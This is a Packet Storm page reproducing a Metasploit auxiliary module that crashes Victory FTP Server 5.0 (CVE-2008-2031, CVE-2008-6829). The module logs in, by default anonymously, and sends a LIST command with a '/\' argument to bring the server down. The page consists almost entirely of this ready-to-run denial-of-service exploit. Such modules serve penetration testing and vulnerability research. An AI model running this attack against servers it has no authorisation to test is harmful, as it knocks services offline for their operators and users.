The Victory FTP Server v5.0 can be brought down by sending a very simple LIST command.
ab130221ed95757c6347b05ac821815901c0087baf07f9967b2ace2ceda0f587##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Victory FTP Server 5.0 LIST DoS',
'Description' => %q{
The Victory FTP Server v5.0 can be brought down by sending
a very simple LIST command
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2008-2031' ],
[ 'CVE', '2008-6829' ],
[ 'OSVDB', '44608' ],
[ 'EDB', '6834' ]
],
'DisclosureDate' => '2008-10-24'))
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
])
end
def run
return unless connect_login
print_status("Sending command...")
# Try to wait for a response
resp = send_cmd(['LIST', [0x2f, 0x5c].pack('CC')])
disconnect
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed